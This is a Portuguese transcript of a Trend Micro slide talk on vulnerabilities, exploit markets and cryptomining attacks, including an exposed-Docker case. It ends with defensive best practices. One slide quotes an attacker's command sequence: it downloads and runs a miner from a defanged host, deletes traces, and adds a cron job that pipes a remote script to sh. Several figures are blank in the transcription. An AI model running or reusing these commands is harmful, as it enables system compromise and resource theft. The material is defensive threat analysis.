Explorações de Vulnerabilidades e Criptomoedas

Transcrição

1 Explorações de Vulnerabilidades e Criptomoedas

2 #whoami Tales Casagrande Catarinense Recebo minhas correspondências em Curitiba Sales Engineer Trend Micro 11 anos na área de TI 5 na área de Segurança Formado em Analise e Desenvolvimento de Sistemas Pós Graduado em Gestão de Projetos

3 Sobre Nós Empresa Japonesa - 30 anos Um mundo seguro para a troca de informações digitais! 20 anos de Brasil: Escritórios/operações em SP, RJ/ES, MG/CO, BSB, PR/SC, RS, N/NE, SP Interior Equipes: negócios, tecnologia, pesquisa local, ameaças futuras, colaboração de produtos, suporte, etc. Novo escritório em São Paulo com aproximadamente 1000m², nova sala de treinamento, hacker space, etc., possibilitando que parceiros e clientes conheçam, interajam e colaborem com nossas tecnologias e ofertas no país. Os clientes incluem 45 das 50 maiores corporações globais 3 Copyright 2018 Trend Micro Inc.

4 Industry Consumers Business Government Healthcare Law Enforcement Responsible disclosure Alerts, blogs, news, reports, guidance 24X7 response, security updates, IPS rules Free tools Private/Public Partnerships Trend Micro Research Threats Vulnerabilities & Exploits Targeted Attacks AI & Machine Learning IoT OT / IIoT Cybercriminal Undergrounds Future Threat Landscape Insights to improve Trend Micro s core technology and products

5 Agenda Introdução Vulnerabilidades e como são exploradas Como funciona pesquisa de vulnerabilidades Como as vulnerabilidades têm sido usadas pelos atacantes Como proteger antes e depois de uma vulnerabilidade ser divulgada Alguns casos... Mitigando Riscos com Boas Práticas!

6 Introdução Em segurança de computadores, uma vulnerabilidade é uma fraqueza que permite que um atacante reduza a garantia da informação de um sistema. Vulnerabilidade é a interseção de três elementos: falha do sistema acesso do atacante à falha capacidade do atacante de explorar a falha Você sabia? O número de vulnerabilidades publicadas a cada ano continua a crescer. A Lista de Vulnerabilidades e Exposições Comuns (CVE) do MITRE incluiu 894 CVEs em 1999 e CVEs publicados em 2016, com 2017 mais que dobrando o número do ano anterior com CVEs. Common Vulnerabilities and Exposures (CVE) é um método de referência para vulnerabilidades e exposições de segurança da informação conhecidas publicamente. Source: Common Vulnerabilities and Exposures List, The MITRE Corporation

7 Vulnerabilidades e como são exploradas O que é... Uma vulnerabilidade? É um erro ou falha de programação que pode ser potencialmente explorada por cibercriminosos para contornar a segurança e obter acesso a um sistema ou rede. Dada a complexidade e quantidade de software atual, as vulnerabilidades são generalizadas e difíceis de identificar. Um expoit? Quando os cibercriminosos querem atacar usando uma vulnerabilidade, eles podem criar uma exploração - isto é, código que pode ser usado para aproveitar a vulnerabilidade. As explorações geralmente são vendidas no mercado negro para invasores que as usam para controlar ou danificar um dispositivo, rede ou aplicativo Um ataque Zero-Day? Quando é lançado um ataque que explora uma vulnerabilidade anteriormente desconhecida, ele é chamado de ataque de dia zero ou simplesmente um zero-day Uma vulnerabilidade Zero-Day? Uma vulnerabilidade que foi divulgada recentemente, mas ainda não corrigida, é uma vulnerabilidade de dia zero. Isso ocorre porque o fornecedor essencialmente tem zero dias para corrigir o problema ou decidiu não corrigi-lo. Uma vulnerabilidade não divulgada? Esta é uma vulnerabilidade que foi descoberta por um pesquisador de segurança e reportada a um programa de recompensas de bugs. A vulnerabilidade é divulgada ao fornecedor afetado, mas não é divulgada ao público em geral até que um patch seja emitido.

8 1.522 é o total de vulnerabilidades divulgadas pelas organizações públicas de relatórios de vulnerabilidade (um subconjunto do número total de vulnerabilidades publicadas e exposições) em As organizações de relatórios públicos incluem indivíduos, fornecedores de segurança, governos e envios anônimos. 2% De todas as vulnerabilidades foram descobertas internamente 98% De todas as vulnerabilidades foram descobertas por terceiros

9 Quais organizações são impactadas? Qualquer organização que tenha sistemas (com vulnerabilidades) que estejam: Ainda não corrigido Obsoleto e, portanto, nenhum patch será desenvolvido Indisponível devido a políticas e restrições do dispositivo Não protegido por contramedidas capacitadas pela mais recente pesquisa de vulnerabilidade Quais são os riscos? Os cibercriminosos procuram ativamente usar as vulnerabilidades para: Obter acesso e escalar privilégios nos sistemas Conduzir ataques de negação de serviço Exfiltrar dados Instalar malwares Modificar arquivos e bancos de dados Assumir o controle de sistemas Como as vulnerabilidades exploradas podem afetar seu negócio? Perda de confiança do consumidor / cliente perda de receita Diminuição do valor para o acionista Custos de mitigação Multas em potencial por não conformidade com os regulamentos de proteção de dados

10 Segundo o Gartner... "Vulnerabilidades e sua exploração ainda são a causa da maioria das violações, [ ] "Os líderes de segurança de TI devem concentrar sua atenção em como as vulnerabilidades estão sendo gerenciadas e devem rastrear essa métrica para fornecer visibilidade sobre como reduzir os maiores riscos de serem violados. Source: Focus on the Biggest Security Threats, Not the Most Publicized, Susan Moore, Gartner, November 2, 2017.

11 Uma maneira de fazer isso é se concentrar primeiro sobre essas vulnerabilidades que estão presentes dentro de seus sistemas operacionais, dispositivos e aplicações que estão sendo ativamente exploradas in the wild. Isso reduz significativamente o número de vulnerabilidades que você precisa corrigir, mitigando riscos para seu negócio. Outro fator a considerar, é claro, será o nível de impacto potencial associado a qualquer vulnerabilidade. Aqueles que não só estão sendo explorados in the wild, mas também Vulnerabilidades Conhecidas Suas Vulnerabilidades Suas Vulnerabilidades que estão sendo exploradas in the wild Suas Vulnerabilidades Mais Críticas que estão sendo exploradas in the wild designados como Crítico ou importante devido ao grau de comprometimento que eles permitem (por exemplo, fornecer acesso remoto a um sistema), certamente garantirá atenção antes de todos os outros.

12 Como funciona pesquisa de vulnerabilidades A pesquisa sobre vulnerabilidades é uma parte extremamente importante, ainda que mal interpretada, de proteger usuários, empresas e governos contra ataques cibernéticos. A disciplina engloba todos os vários processos que as equipes de engenharia e pesquisadores de segurança usam para identificar e divulgar falhas em programas de software que podem levar a problemas de segurança. Esses esforços incluem: engenharia reversa, fuzzing, análise de código fonte e uma série de outras técnicas para descobrir possíveis vulnerabilidades. No entanto, nem todos que conduzem pesquisas de vulnerabilidade usam um white hat. De fato, o mercado total de pesquisa sobre vulnerabilidade inclui: White Market? Programas de recompensa de bugs, concursos de hacking e pesquisadores de segurança identificam vulnerabilidades e usam a divulgação responsável para criar responsabilidade. Gray Market? Algumas empresas e pesquisadores legítimos operam em uma zona cinzenta legal dentro do mercado de dia zero, vendendo exploits para governos e agências de aplicação da lei em todo o mundo. Black Market? No mercado negro, as falhas são vendidas pelo maior lance. Eles podem ser usados para criar exploits para invadir indivíduos, empresas e grupos privados ou públicos.

13 A contagem regressiva para divulgação pública As organizações do mercado branco, seguem um processo de divulgação responsável para relatar vulnerabilidades aos fabricantes em particular, dando-lhes 120 dias para resolver o problema antes de torná-lo público. A natureza de contagem regressiva da divulgação responsável leva as empresas a lidar com o problema de maneira rápida e eficaz, promovendo responsabilidade e transparência em todo o ecossistema de software. Você sabia? Um bug bounty é um programa de recompensas por relatar vulnerabilidades. Fornecedores respeitáveis, como Intel, Yahoo, Snapchat e muitos outros, incentivam o hacking ético de seus softwares por meio de programas de recompensas de bugs: Dropbox: Oferece entre US $ e US $ para uma vulnerabilidade descoberta Apple: Pagará US $ para o caçador de recompensas que pode extrair dados protegidos pela tecnologia Secure Enclave da Apple Google: pagará US $ por problemas de design e implementação em seus aplicativos do Google Microsoft: pagará no máximo US $ por uma vulnerabilidade crítica e importante em seus Serviços Online Fonte: Guru99, Top 20 programas de recompensa de bugs em 2018

14 Para que os atacantes têm explorado as vulnerabilidades Negação de Serviço A parada de um serviço pode ser causada diretamente através da exploração de uma falha em um software, ou através de um ataque que utilize desta vulnerabilidade em conjunto com outra ameala (ransomware), causando a indisponibilidade. Vazamento de Dados Uma fuga de informações pode implicar em perda de propriedade intelectual, quebra de sigilo, queda nas ações da empresa, perda de confiança dos clientes/mercado, custos de investigação, impacto à marca, multas e descuprimento legal (GDRP e LGPD) e etc. Mineração A mineração pode comprometer recursos importantes para a atividade da empresa, o que pode levar a queda de performance e custos maiores de aparelhagem devido ao consumo de poder de processamento por causa da mineração. Outros...

16 A febre das Criptomoedas Uma criptomoeda (um tipo de moeda Digital descentralizada) é um meio de troca que se utiliza da tecnologia de blockchain e da criptografia para assegurar a validade das transações e a criação de novas unidades da moeda.

17 Alguns casos Descobrimos que o impacto ultrapassa os problemas de desempenho. De 1º de janeiro a 24 de junho de 2017, nossos sensores detectaram mineradores de bitcoin que realizaram mais de atividades de mineração de bitcoin e descobrimos que mais de 20% dessas mineradoras também realizaram ataques baseados na rede e na web. E. Os ataques mais comuns que vimos foram: Cross-site scripting Explorando uma vulnerabilidade de execução remota de código no Internet Information Server (IIS) da Microsoft Força bruta e logins / ataques de senha padrão Explorações de bufferoverflow Injeção de código arbitrário do Hypertext Preprocessor (PHP) SQL Injection BlackNurse ataque de negação de serviço

18

19 Malicious Traffic in Port 7001 Surges as Cryptominers Target Patched 2017 Oracle WebLogic Vulnerability Figura 1. Tráfego mal-intencionado de 27 de abril a 9 de maio foi detectado em várias portas, a maioria proveniente de 7001 / TCP. Figura 2. Solicitação HTTP mal-intencionada enviada para servidores vulneráveis

20 Se a vulnerabilidade for explorada com êxito e o logo shell.sh (Coinminer_MALXMR.DBFAJ-Component) baixado, as seguintes ações serão iniciadas: Checagem de atividades de mineração desconhecidas, como: #pkill -f minergate #pkill -f minergate-cli Download e execução das configurações de criptografia: #wget -O /tmp vmak hxxp: // /xmrig_64 #wget -O /tmp/httpd5_w1.conf hxxp: // /httpd5_w1.conf #chmod + x /tmp/vmak #nohup /tmp/vmak -c /tmp/httpd5_w1.conf>/dev/null 2> & 1 & Remoção da execução para cobrir os rastros: #rm -rf /tmp/httpd5_w1.conf #rm -f / tmp / vmak #rm -rf /tmp/logo8.sh Execução de tarefas agendas: echo * * * * * wget -q hxxp: // /logo8.sh -O - sh >> >> / tmp / cron verdadeiro && crontab / tmp / cron

21 Misconfigured Container Abused to Deliver Cryptocurrency-mining Malware Abuso dos sistemas que estavam executando o Docker Engine-Community configurado incorretamente com as portas do Docker expostas. As atividades maliciosas estavam focadas na varredura das portas abertas 2375/TCP e 2376/TCP, que são usadas pelo daemon do mecanismo Docker (dockerd). A invasão tenta implantar um malware de mineração de criptomoedas (detectado pela Trend Micro como Coinminer.SH.MALXMR.ATNE) nos sistemas mal configurados.

22 Fonte:

23 O Docker implementa a virtualização no nível do sistema operacional (OS). As APIs do Docker, em particular, permitem que usuários remotos controlem imagens do Docker como um cliente local do Docker. A exposição a ameaças por meio de configurações incorretas não é nova, mas pode ser um desafio permanente para as organizações.na verdade, nossa pesquisa no Shodan revelou que muitos ainda têm seus hosts do Docker mal configurados, especialmente na China.

24 Fonte: Figura 2: Cadeia de infecção dos ataques envolvendo mecanismo Docker mal configurado Figura 1: Linha de tempo (superior) e distribuição por país (parte inferior) de atividades malintencionadas e / ou abuso de configuração incorreta observados nas portas 2375 e 2376

25 Packet traces e payload analysis Observamos que os invasores geralmente criam contêineres do Docker por meio de portas de API expostas (mostradas na Figura 2) e executam comandos em instâncias do Docker comprometidas: Instalação de um pacote wget usando o gerenciador de pacotes do sistema Uso do wget para baixar um script de implantação automática Converção do script do DOS para o formato Unix (as terminações da linha de script geralmente estão no formato DOS) Definição das permissões executáveis para o script Execução o script (auto.sh) Figura 3: Rastreio de pacote do invasor que cria um contêiner do Docker por meio da porta da API do Docker exposta

26 Mitigando Riscos com Boas Práticas Backup Em local isolado da rede Manter patches atualizados Minimizar possibilidade de exploração de vulnerabilidades Instale o essencial Remover Serviços e Aplicações não utilizados evitando assim possíveis ataques e explorações de vulnerabilidades Controle de Acesso Limitar o acesso a dados críticos e compartilhamentos de rede a usuários que realmente necessitem Aumentar postura de segurança Seguir as melhores práticas de segurança para suas atuais e futuras tecnologias Visibilidade Tenha controle dos sistemas e aplicações que estão conectados à rede

27 Dúvidas?

28

29 Siga nos: Than facebook.com/trendmicrobrasil linkedin.com/company/trend-micro-brasil twitter.com/trendmicrobr Tales_Casagrande@trendmicro.com